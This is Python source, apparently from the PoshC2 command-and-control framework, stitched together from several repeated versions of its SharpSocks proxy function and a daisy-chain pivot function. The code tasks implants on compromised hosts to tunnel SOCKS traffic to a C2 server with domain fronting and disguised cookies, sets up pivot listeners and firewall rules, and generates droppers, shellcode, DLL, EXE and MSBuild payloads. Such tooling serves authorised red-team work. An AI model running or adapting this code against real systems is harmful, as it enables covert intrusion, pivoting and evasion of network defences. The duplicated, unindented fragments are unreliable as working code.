def do_sharpsocks(user, command, randomuri):
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"),
select_item("DomainFrontHeader", "C2Server"))
dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
implant = get_implantdetails(randomuri)
pivot = implant.Pivot
if pivot != "PS":
sharpurl = input("Enter the URL for SharpSocks: ")
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" %
(channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri.lower() == "n":
print("")
if (ri == "") or (ri.lower() == "y"):
taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (
sharpurl, channel, sharpkey, sharpurls)
if dfheader:
taskcmd += " -DomainFrontURL %s" % dfheader
new_task(taskcmd, user, randomuri)
update_label("SharpSocks", randomuri)
def do_sharpsocks(user, command, randomuri):
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurls = sharpurls.split(",")
sharpurl = select_item("PayloadCommsHost",
"C2Server").replace('"', '').split(',')[0]
user_agent = select_item("UserAgent", "C2Server")
dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
print(
"\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031"
)
print(
"sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" %
(channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN)
print("\nElse\n")
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" %
(channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri == "":
if dfheader:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\""
% (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""),
sharpurls[1].replace("\"", ""), dfheader, user_agent), user,
randomuri)
else:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\""
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", ""), user_agent),
user, randomuri)
if ri.lower() == "y":
if dfheader:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\""
% (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""),
sharpurls[1].replace("\"", ""), dfheader, user_agent), user,
randomuri)
else:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\""
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", ""), user_agent),
user, randomuri)
print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_sharpsocks(user, command, randomuri):
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurls = sharpurls.split(",")
sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"),
select_item("DomainFrontHeader", "C2Server"))
dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" %
(channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri == "":
if dfheader:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s"
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", ""), dfheader), user,
randomuri)
else:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken"
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", "")), user,
randomuri)
if ri.lower() == "y":
if dfheader:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s"
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", ""), dfheader), user,
randomuri)
else:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken"
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", "")), user,
randomuri)
print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_startdaisy(user, command, randomuri):
check_module_loaded("invoke-daisychain.ps1", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(
Colours.RED +
"Daisy from an unelevated context can only bind to localhost, continue? y/N "
+ Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " +
Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " +
Colours.END)
firstdaisy = input(Colours.GREEN +
"Is this the first daisy in the chain? Y/n? " +
Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN +
f"C2 URL (leave blank for {default_url}): " +
Colours.END)
domain_front = input(
Colours.GREEN +
f"Domain front header (leave blank for {str(default_df_header)}): "
+ Colours.END)
proxy_user = input(
Colours.GREEN +
"Proxy user (<domain>\\<username>, leave blank if none): " +
Colours.END)
proxy_pass = input(Colours.GREEN +
"Proxy password (leave blank if none): " +
Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " +
Colours.END)
cred_expiry = input(
Colours.GREEN +
"Password/Account Expiration Date: .e.g. 15/03/2018: ")
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN +
"Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " +
Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"
if domain_front:
command = command + f" -domfront {domain_front}"
if proxy_url:
command = command + f" -proxyurl '{proxy_url}'"
if proxy_user:
command = command + f" -proxyuser '{proxy_user}'"
if proxy_pass:
command = command + f" -proxypassword '{proxy_pass}'"
if elevated.lower() == "y" or elevated == "":
firewall = input(Colours.GREEN +
"Add firewall rule? (uses netsh.exe) y/N: ")
if firewall.lower() == "n" or firewall == "":
command = command + " -nofwrule"
else:
print_good(
"Not elevated so binding to localhost and not adding firewall rule"
)
command = command + " -localhost"
urls = get_allurls()
command = command + f" -urls '{urls}'"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(
Colours.GREEN +
"Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"",
"\"\"", proxy_url, proxy_user, proxy_pass,
cred_expiry)
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
"%s?d" % get_newimplanturl(),
PayloadsDirectory,
URLID=urlId,
PowerShellProxyCommand=proxynone)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (upstream_url),
"$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
def do_sharpsocks(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
from random import choice
channel = "".join(choice(string.ascii_letters) for _ in range(25))
sharp_key = gen_key().decode("utf-8")
default_sharp_urls = get_sharpurls()
urls_prompt = PromptSession(history=FileHistory(
f'{PoshProjectDirectory}/.comma-separated-urls-history'),
auto_suggest=AutoSuggestFromHistory(),
style=style)
socks_proxy_urls = urls_prompt.prompt(
f"What URIs would you like to use for SharpSocks? Default is {default_sharp_urls.replace(' ', '')}: "
)
if not socks_proxy_urls:
socks_proxy_urls = default_sharp_urls
socks_proxy_urls = socks_proxy_urls.split(",")
if len(socks_proxy_urls) < 2:
print("Please specify at least two URIs")
return
socks_proxy_urls = [i.replace("\"", "").strip() for i in socks_proxy_urls]
socks_proxy_urls = [(i[1:] if i.startswith("/") else i)
for i in socks_proxy_urls]
default_sharp_url = select_item("PayloadCommsHost",
"C2Server").replace('"', '').split(',')[0]
domains_prompt = PromptSession(history=FileHistory(
f'{PoshProjectDirectory}/.protocol-and-domain-history'),
auto_suggest=AutoSuggestFromHistory(),
style=style)
sharp_url = domains_prompt.prompt(
f"What domain would you like to use for SharpSocks? Default is {default_sharp_url}: "
)
if not sharp_url:
sharp_url = default_sharp_url
if not sharp_url.startswith("http"):
print("Please specify a protocol (http/https)")
return
default_host_header = get_first_dfheader(
select_item("DomainFrontHeader", "C2Server"))
host_headers_prompt = PromptSession(history=FileHistory(
'%s/.host-headers-history' % PoshProjectDirectory),
auto_suggest=AutoSuggestFromHistory(),
style=style)
host_header = host_headers_prompt.prompt(
f"What host header should used? Default is {default_host_header}: ")
if not host_header:
host_header = default_host_header
default_user_agent = select_item("UserAgent", "C2Server")
user_agent_prompt = PromptSession(history=FileHistory(
'%s/.user-agents-history' % PoshProjectDirectory),
auto_suggest=AutoSuggestFromHistory(),
style=style)
user_agent = user_agent_prompt.prompt(
f"What user agent? Default is \"{default_user_agent}\": ")
if not user_agent:
user_agent = default_user_agent
default_beacon = "200"
beacon_prompt = PromptSession(history=FileHistory('%s/.beacon-history' %
PoshProjectDirectory),
auto_suggest=AutoSuggestFromHistory(),
style=style)
beacon = beacon_prompt.prompt(
f"What beacon interval would you like SharpSocks to use (ms)? Default: {default_beacon}ms: "
)
if not beacon:
beacon = default_beacon
if beacon.strip().endswith("ms"):
beacon = beacon.replace("ms", "").strip()
server_command = f"{PoshInstallDirectory}resources/SharpSocks/SharpSocksServer/SharpSocksServer -c={channel} -k={sharp_key} -l={SocksHost} -v"
if " -v" in command or " --verbose" in command:
server_command += " --verbose"
server_command += "\n"
print(
Colours.GREEN +
"\nOk, run this command from your SharpSocksServer directory to launch the SharpSocks server:\n"
)
print(server_command)
task = f"run-exe SharpSocksImplant.Program SharpSocksImplant -s {sharp_url} -c {channel} -k {sharp_key} -url1 {socks_proxy_urls[0]} -url2 {socks_proxy_urls[1]} -b {beacon} -r {beacon} --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"{user_agent}\""
if host_header:
task += f" -df {host_header}"
extra_args = command.replace("sharpsocks ", "").strip()
if extra_args:
task += " " + extra_args
confirm = input(
"Are you ready to start the SharpSocks in the implant? (Y/n) ")
if confirm == "" or confirm.lower() == "y":
new_task(task, user, randomuri)
else:
print("Aborted...")
return
print("SharpSocks task issued, to stop SharpSocks run stopsocks")
